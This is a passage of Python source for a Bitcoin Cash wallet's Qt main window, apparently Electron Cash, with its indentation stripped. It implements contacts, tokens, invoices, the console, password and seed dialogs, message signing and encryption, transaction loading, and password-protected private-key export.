self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
old_entry = self.contacts.get(address, None)
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.update_completions()
# The contact has changed, update any addresses that are displayed with the old information.
run_hook('update_contact', address, self.contacts[address], old_entry)
return True
def delete_contacts(self, addresses):
contact_str = " + ".join(addresses) if len(addresses) <= 3 else _("{} contacts").format(len(addresses))
if not self.question(_("Remove {} from your list of contacts?")
.format(contact_str)):
return
removed_entries = []
for address in addresses:
if address in self.contacts.keys():
removed_entries.append((address, self.contacts[address]))
self.contacts.pop(address)
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.contact_list.update()
self.update_completions()
run_hook('delete_contacts', removed_entries)
def add_token_type(self, token_class, token_id, token_name, decimals_divisibility, *, error_callback=None, show_errors=True, allow_overwrite=False):
# FIXME: are both args error_callback and show_errors both necessary?
# Maybe so if we want the default to be self.show_error...
if not show_errors:
# setting error_callback to None will suppress errors being shown
# iff show_errors is False
error_callback = None
if error_callback is None and show_errors:
# They asked for errors but supplied no callback. Use the standard
# one for main_window
error_callback = self.show_error
# The below call checks sanity and calls error_callback for us
# with an error message argument on failure, returning False.
# On success it will add the token, write to wallet storage,
# and potentially kick off the verifier.
if not self.wallet.add_token_safe(
token_class, token_id, token_name, decimals_divisibility,
error_callback=error_callback, allow_overwrite=allow_overwrite,
write_storage=True):
return False
# Great success! Update GUI.
self.token_list.update()
self.update_token_type_combo()
self.slp_history_list.update()
return True
def delete_slp_token(self, token_ids):
if not self.question(_("Remove {} from your list of tokens?")
.format(" + ".join(token_ids))):
return
for tid in token_ids:
self.wallet.token_types.pop(tid)
self.token_list.update()
self.update_token_type_combo()
self.slp_history_list.update()
self.wallet.save_transactions(True)
def show_invoice(self, key):
pr = self.invoices.get(key)
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self.top_level_window(), _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1].to_ui_string(), pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
weakD = Weak.ref(d)
def do_export():
ext = pr.export_file_ext()
fn = self.getSaveFileName(_("Save invoice to file"), "*." + ext)
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.export_file_data())
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.invoice_list.update()
d = weakD()
if d: d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
d.setParent(None) # So Python can GC
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console(wallet=self.wallet)
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet' : self.wallet,
'network' : self.network,
'plugins' : self.gui_object.plugins,
'window': self})
console.updateNamespace({'util' : util, 'bitcoin':bitcoin})
set_json = Weak(self.console.set_json)
c = commands.Commands(self.config, self.wallet, self.network, lambda: set_json(True))
methods = {}
password_getter = Weak(self.password_dialog)
def mkfunc(f, method):
return lambda *args, **kwargs: f(method, *args, password_getter=password_getter,
**kwargs)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
sb.addWidget(self.balance_label)
self._search_box_spacer = QWidget()
self._search_box_spacer.setFixedWidth(6) # 6 px spacer
self.search_box = QLineEdit()
self.search_box.setPlaceholderText(_("Search wallet, {key}F to hide").format(key='Ctrl+' if sys.platform != 'darwin' else '⌘'))
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box, 1)
self.addr_format_label = QLabel("")
sb.addPermanentWidget(self.addr_format_label)
self.update_available_button = StatusBarButton(QIcon(":icons/electron-cash-update.svg"), _("Update available, click for details"), lambda: self.gui_object.show_update_checker(self, skip_check=True))
self.update_available_button.setStatusTip(_("An Electron Cash update is available"))
sb.addPermanentWidget(self.update_available_button)
self.update_available_button.setVisible(bool(self.gui_object.new_version_available)) # if hidden now gets unhidden by on_update_available when a new version comes in
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
self.addr_converter_button = StatusBarButton(
self.cashaddr_icon(),
_("Toggle CashAddr Display"),
self.toggle_cashaddr_status_bar
)
sb.addPermanentWidget(self.addr_converter_button)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.svg"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
weakSelf = Weak(self)
gui_object = self.gui_object
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.svg"), _("Network"), lambda: gui_object.show_network_dialog(weakSelf))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def on_update_available(self, b):
self.update_available_button.setVisible(bool(b))
# The popup label won't really be shown unless this window is
# on top.. but regardless we give each label a unique internal name
# so they dont interfere with each other.
lblName = "UpdateAvailable_" + self.diagnostic_name()
if b:
ShowPopupLabel(name = lblName,
text="<center><b>{}</b><br><small>{}</small></center>".format(_("Update Available"),_("Click for details")),
target=self.update_available_button,
timeout=20000, onClick=self.update_available_button.click,
onRightClick=self.update_available_button.click,
dark_mode = ColorScheme.dark_scheme)
else:
# Immediately kills any extant labels
KillPopupLabel(lblName)
def update_lock_icon(self):
icon = QIcon(":icons/lock.svg") if self.wallet.has_password() else QIcon(":icons/unlock.svg")
tip = _('Wallet Password') + ' - '
tip += _('Enabled') if self.wallet.has_password() else _('Disabled')
self.password_button.setIcon(icon)
self.password_button.setStatusTip(tip)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.can_change_password())
is_cointext = bool(self.payto_e.cointext)
if is_cointext and self.slp_token_id:
self.token_type_combo.setCurrentIndex(0)
self.send_button.setVisible(not self.wallet.is_watching_only() and not is_cointext)
self.preview_button.setVisible(not is_cointext)
self.cointext_button.setVisible(is_cointext)
def change_password_dialog(self):
from .password_dialog import ChangePasswordDialog
d = ChangePasswordDialog(self.top_level_window(), self.wallet)
ok, password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(password, new_password, encrypt_file)
except BaseException as e:
self.show_error(str(e))
return
except:
if util.is_verbose:
traceback.print_exc(file=sys.stderr)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if new_password else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def get_passphrase_dialog(self, msg : str, title : str = None, *, permit_empty = False) -> str:
from .password_dialog import PassphraseDialog
d = PassphraseDialog(self.wallet, self.top_level_window(), msg, title, permit_empty = permit_empty)
return d.run()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.balance_label.setHidden(True)
self.statusBar().insertWidget(0, self._search_box_spacer)
self._search_box_spacer.show()
self.search_box.setFocus(1)
if self.search_box.text():
self.do_search(self.search_box.text())
else:
self._search_box_spacer.hide()
self.statusBar().removeWidget(self._search_box_spacer)
self.balance_label.setHidden(False)
self.do_search('')
def do_search(self, t):
'''Apply search text to all tabs. FIXME: if a plugin later is loaded
it will not receive the search filter -- but most plugins I know about
do not support searchable_list anyway, so hopefully it's a non-issue.'''
for i in range(self.tabs.count()):
tab = self.tabs.widget(i)
try:
tab.searchable_list.filter(t)
except (AttributeError, TypeError):
pass
def new_contact_dialog(self):
d = WindowModalDialog(self.top_level_window(), _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self.top_level_window(), _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton()
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + ' ' + str(key+1)
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path) # implicitly also calls stop_wallet
self.update_recently_visited(wallet_path) # this ensures it's deleted from the menu
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
self.close()
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog, SeedBackupDialog
WhichClass = SeedBackupDialog if self.wallet.storage.get('wallet_seed_needs_backup') else SeedDialog
d = WhichClass(self.top_level_window(), seed, passphrase, wallet=self.wallet)
if d.exec_() == QDialog.Accepted:
# This banch is in case they were in the SeedBackupDialog; below
# makes the new non-warning icon (if any) take effect
self.update_status()
d.setParent(None) # gc now rather than later
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
d.setParent(None) # Help Python GC this sooner rather than later
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
if util.is_verbose:
traceback.print_exc(file=sys.stderr)
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self.top_level_window(), _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel('{}: {}'.format(_("Address"), address)))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
pk_lbl = QLabel(_("Private key") + ':')
vbox.addWidget(pk_lbl)
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton()
# BIP38 Encrypt Button
def setup_encrypt_button():
encrypt_but = QPushButton(_("Encrypt BIP38") + "...")
f = encrypt_but.font(); f.setPointSize(f.pointSize()-1); encrypt_but.setFont(f) # make font -= 1
encrypt_but.setEnabled(bool(bitcoin.Bip38Key.canEncrypt()))
encrypt_but.setToolTip(_("Encrypt this private key using BIP38 encryption")
if encrypt_but.isEnabled() else
_("BIP38 encryption unavailable: install pycryptodomex to enable"))
border_color = ColorScheme.DEFAULT.as_color(False)
border_color.setAlphaF(0.65)
encrypt_but_ss_en = (
keys_e.styleSheet() + (("QPushButton { border: 1px solid %s; border-radius: 6px; padding: 2px; margin: 2px; } "
"QPushButton:hover { border: 1px solid #3daee9; } "
"QPushButton:disabled { border: 1px solid transparent; ") % (border_color.name(QColor.HexArgb)))
)
encrypt_but_ss_dis = ( keys_e.styleSheet() )
encrypt_but.setStyleSheet(encrypt_but_ss_en if encrypt_but.isEnabled() else encrypt_but_ss_dis)
def on_encrypt():
passphrase = self.get_passphrase_dialog(
msg = (
_("Specify a passphrase to use for BIP38 encryption.") + "\n" +
_("Save this passphrase if you save the generated key so you may decrypt it later.")
)
)
if not passphrase:
return
try:
bip38 = str(bitcoin.Bip38Key.encrypt(pk, passphrase))
keys_e.setText(bip38)
encrypt_but.setEnabled(False)
encrypt_but.setStyleSheet(encrypt_but_ss_dis)
pk_lbl.setText( _("BIP38 Key") + ":" )
self.show_message(_("WIF key has been encrypted using BIP38.\n\n"
"You may save this encrypted key to a file or print out its QR code and/or text.\n\n"
"It is strongly encrypted with the passphrase you specified and safe to store electronically. "
"However, the passphrase should be stored securely and not shared with anyone."))
except Exception as e:
if util.is_verbose:
traceback.print_exc(file=sys.stderr)
self.show_error(str(e))
encrypt_but.clicked.connect(on_encrypt)
keys_e.addWidget(encrypt_but, 0)
setup_encrypt_button()
# /BIP38 Encrypt Button
vbox.addWidget(keys_e)
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=address.to_script().hex())
rds_e.addCopyButton()
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
try:
addr = Address.from_string(address)
except:
self.show_message(_('Invalid Bitcoin Cash address.'))
return
if addr.kind != addr.ADDR_P2PKH:
msg_sign = ( _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' +
_('The operation is undefined. Not just in Electron Cash, but in general.') )
self.show_message(_('Cannot sign messages with this type of address.') + '\n\n' + msg_sign)
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(addr):
self.show_message(_('Address not in wallet.'))
return
task = partial(self.wallet.sign_message, addr, message, password)
def show_signed_message(sig):
signature.setText(base64.b64encode(sig).decode('ascii'))
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
try:
address = Address.from_string(address.text().strip())
except:
self.show_message(_('Invalid Bitcoin Cash address.'))
return
message = message.toPlainText().strip().encode('utf-8')
try:
# This can throw on invalid base64
sig = base64.b64decode(signature.toPlainText())
verified = bitcoin.verify_message(address, sig, message)
except:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=None):
d = WindowModalDialog(self.top_level_window(), _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address.to_ui_string() if address else '')
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
self.wallet.thread.add(task, on_success=lambda text: message_e.setText(text.decode('utf-8')))
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
encrypted = bitcoin.encrypt_message(message, pubkey_e.text())
encrypted_e.setText(encrypted.decode('ascii'))
except BaseException as e:
if util.is_verbose:
traceback.print_exc(file=sys.stderr)
self.show_warning(str(e))
def encrypt_message(self, address=None):
d = WindowModalDialog(self.top_level_window(), _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
if not isinstance(pubkey, str):
pubkey = pubkey.to_ui_string()
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
return PasswordDialog(parent, msg).run()
def tx_from_text(self, txt):
from electroncash.transaction import tx_from_str
try:
txt_tx = tx_from_str(txt)
tx = Transaction(txt_tx, sign_schnorr=self.wallet.is_schnorr_enabled())
tx.deserialize()
if self.wallet:
my_coins = self.wallet.get_spendable_coins(None, self.config)
my_outpoints = [vin['prevout_hash'] + ':' + str(vin['prevout_n']) for vin in my_coins]
for i, txin in enumerate(tx.inputs()):
outpoint = txin['prevout_hash'] + ':' + str(txin['prevout_n'])
if outpoint in my_outpoints:
my_index = my_outpoints.index(outpoint)
tx._inputs[i]['value'] = my_coins[my_index]['value']
return tx
except:
if util.is_verbose:
traceback.print_exc(file=sys.stderr)
self.show_critical(_("Electron Cash was unable to parse your transaction"))
return
# Due to the asynchronous nature of the qr reader we need to keep the
# dialog instance as member variable to prevent reentrancy/multiple ones
# from being presented at once.
_qr_dialog = None
def read_tx_from_qrcode(self):
if self._qr_dialog:
# Re-entrancy prevention -- there is some lag between when the user
# taps the QR button and the modal dialog appears. We want to
# prevent multiple instances of the dialog from appearing, so we
# must do this.
self.print_error("Warning: QR dialog is already presented, ignoring.")
return
if self.gui_object.warn_if_cant_import_qrreader(self):
return
from electroncash import get_config
from .qrreader import QrReaderCameraDialog
data = ''
self._qr_dialog = None
try:
self._qr_dialog = QrReaderCameraDialog(parent=self.top_level_window())
def _on_qr_reader_finished(success: bool, error: str, result):
if self._qr_dialog:
self._qr_dialog.deleteLater(); self._qr_dialog = None
if not success:
if error:
self.show_error(error)
return
if not result:
return
# if the user scanned a bitcoincash URI
if result.lower().startswith(networks.net.CASHADDR_PREFIX + ':') or result.lower().startswith(networks.net.SLPADDR_PREFIX + ':'):
self.pay_to_URI(result)
return
# else if the user scanned an offline signed tx
try:
result = bh2u(bitcoin.base_decode(result, length=None, base=43))
tx = self.tx_from_text(result) # will show an error dialog on error
if not tx:
return
except BaseException as e:
self.show_error(str(e))
return
self.show_transaction(tx)
self._qr_dialog.qr_finished.connect(_on_qr_reader_finished)
self._qr_dialog.start_scan(get_config().get_video_device())
except BaseException as e:
if util.is_verbose:
traceback.print_exc(file=sys.stderr)
self._qr_dialog = None
self.show_error(str(e))
def read_tx_from_file(self, *, fileName = None):
fileName = fileName or self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r", encoding='utf-8') as f:
file_content = f.read()
file_content = file_content.strip()
tx_file_dict = json.loads(str(file_content))
except (ValueError, IOError, OSError, json.decoder.JSONDecodeError) as reason:
self.show_critical(_("Electron Cash was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
tx = self.tx_from_text(file_content)
return tx
def do_process_from_text(self):
from electroncash.transaction import SerializationError
text = text_dialog(self.top_level_window(), _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
try:
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
except SerializationError as e:
self.show_critical(_("Electron Cash was unable to deserialize the transaction:") + "\n" + str(e))
def do_process_from_file(self, *, fileName = None):
from electroncash.transaction import SerializationError
try:
tx = self.read_tx_from_file(fileName=fileName)
if tx:
self.show_transaction(tx)
except SerializationError as e:
self.show_critical(_("Electron Cash was unable to deserialize the transaction:") + "\n" + str(e))
def do_process_from_txid(self, *, txid=None, parent=None):
parent = parent or self
if self.gui_object.warn_if_no_network(parent):
return
from electroncash import transaction
ok = txid is not None
if not ok:
txid, ok = QInputDialog.getText(parent, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
ok, r = self.network.get_raw_tx_for_txid(txid, timeout=10.0)
if not ok:
parent.show_message(_("Error retrieving transaction") + ":\n" + r)
return
tx = transaction.Transaction(r, sign_schnorr=self.wallet.is_schnorr_enabled()) # note that presumably the tx is already signed if it comes from blockchain so this sign_schnorr parameter is superfluous, but here to satisfy my OCD -Calin
self.show_transaction(tx)
def export_bip38_dialog(self):
''' Convenience method. Simply calls self.export_privkeys_dialog(bip38=True) '''
self.export_privkeys_dialog(bip38 = True)
@protected
def export_privkeys_dialog(self, password, *, bip38=False):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
if bip38:
self.show_error(_('WARNING: This is a multi-signature wallet.') + '\n' +
_("It cannot be used with BIP38 encrypted keys."))
return
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It can not be "backed up" by simply exporting these private keys.'))
if bip38:
if not bitcoin.Bip38Key.canEncrypt() or not bitcoin.Bip38Key.isFast():
self.show_error(_("BIP38 Encryption is not available. Please install 'pycryptodomex' and restart Electron Cash to enable BIP38."))
return
passphrase = self.get_passphrase_dialog(
msg = (
_("You are exporting your wallet's private keys as BIP38 encrypted keys.") + "\n\n" +
_("You must specify a passphrase to use for encryption.") + "\n" +
_("Save this passphrase so you may decrypt your BIP38 keys later.")
)
)
if not passphrase:
# user cancel
return
bip38 = passphrase # overwrite arg with passphrase.. for use down below ;)
class MyWindowModalDialog(WindowModalDialog):
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
d = MyWindowModalDialog(self.top_level_window(), _('Private keys'))
weak_d = Weak.ref(d)
d.setObjectName('WindowModalDialog - Private Key Export')
destroyed_print_error(d) # track object lifecycle
d.setMinimumSize(850, 300)
vbox = QVBoxLayout(d)
lines = [ _("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties.") ]
if bip38:
del lines[0] # No need to scream-WARN them since BIP38 *are* encrypted
msg = '\n'.join(lines)
vbox.addWidget(QLabel(msg))
if bip38:
wwlbl = WWLabel()
def set_ww_txt(pf_shown=False):
if pf_shown:
pf_text = ("<font face='{monoface}' size=+1><b>"
+ bip38
+ '</b></font> <a href="hide">{link}</a>').format(link=_("Hide"), monoface=MONOSPACE_FONT)
else:
pf_text = '<a href="show">{link}</a>'.format(link=_("Click to show"))
wwlbl.setText(
_("The below keys are BIP38 <i>encrypted</i> using the passphrase: {passphrase}<br>"
"Please <i>write this passphrase down</i> and store it in a secret place, separate from these encrypted keys."
).format(passphrase=pf_text)
)
def toggle_ww_txt(link):
set_ww_txt(link=="show")
set_ww_txt()
wwlbl.linkActivated.connect(toggle_ww_txt)
vbox.addWidget(wwlbl)
e = QTextEdit()
e.setFont(QFont(MONOSPACE_FONT))
e.setWordWrapMode(QTextOption.NoWrap)
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electron-cash-private-keys.csv' if not bip38 else 'electron-cash-bip38-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
stop = False
def privkeys_thread():
for addr in addresses:
if not bip38:
# This artificial sleep is likely a security / paranoia measure
# to allow user to cancel or to make the process "feel expensive".
# In the bip38 case it's already slow enough so this delay
# is not needed.
time.sleep(0.100)
if stop:
return
try:
privkey = self.wallet.export_private_key(addr, password)
if bip38 and privkey:
privkey = str(bitcoin.Bip38Key.encrypt(privkey, bip38)) # __str__() -> base58 encoded bip38 key
except InvalidPassword:
# See #921 -- possibly a corrupted wallet or other strangeness
privkey = 'INVALID_PASSWORD'
if self.is_slp_wallet: #TODO: also create special prefix for SLP wallet private keys
private_keys[addr.to_full_string(Address.FMT_SLPADDR)] = privkey
else:
private_keys[addr.to_full_string(Address.FMT_CASHADDR)] = privkey
strong_d = weak_d()
try:
if strong_d and not stop:
strong_d.computing_privkeys_signal.emit()
else:
return
finally:
del strong_d
if stop:
return
strong_d = weak_d()
if strong_d:
strong_d.show_privkeys_signal.emit()
def show_privkeys():
nonlocal stop
if stop:
return
s = "\n".join('{:45} {}'.format(addr, privkey)
for addr, privkey in private_keys.items())
e.setText(s)
b.setEnabled(True)
stop = True
thr = None
def on_dialog_closed(*args):
nonlocal stop
stop = True
try: d.computing_privkeys_signal.disconnect()
except TypeError: pass
try: d.show_privkeys_signal.disconnect()
except TypeError: pass
try: d.finished.disconnect()
except TypeError: pass
if thr and thr.is_alive():
thr.join(timeout=1.0) # wait for thread to end for maximal GC mojo
def computing_privkeys_slot():
if stop:
return
e.setText(_("Please wait... {num}/{total}").format(num=len(private_keys),total=len(addresses)))
d.computing_privkeys_signal.connect(computing_privkeys_slot)
d.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
thr = threading.Thread(target=privkeys_thread, daemon=True)
thr.start()
res = d.exec_()
if not res:
stop = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electron Cash was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+", encoding='utf-8') as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
labelsFile = self.getOpenFileName(_("Open labels file"), "*.json")
if not labelsFile: return
try:
with open(labelsFile, 'r', encoding='utf-8') as f: # always ensure UTF-8. See issue #1453.
data = f.read()
data = json.loads(data)
if type(data) is not dict or not len(data) or not all(type(v) is str and type(k) is str for k,v in data.items()):
self.show_critical(_("The file you selected does not appear to contain labels."))
return
for key, value in data.items():
self.wallet.set_label(key, value)
self.show_message(_("Your labels were imported from") + " '%s'" % str(labelsFile))
except (IOError, OSError, json.decoder.JSONDecodeError) as reason:
self.show_critical(_("Electron Cash was unable to import your labels.") + "\n" + str(reason))
self.address_list.update()
self.history_list.update()
self.utxo_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def do_export_labels(self):
labels = self.wallet.labels
try:
fileName = self.getSaveFileName(_("Select file to save your labels"), 'electron-cash_labels.json', "*.json")
if fileName:
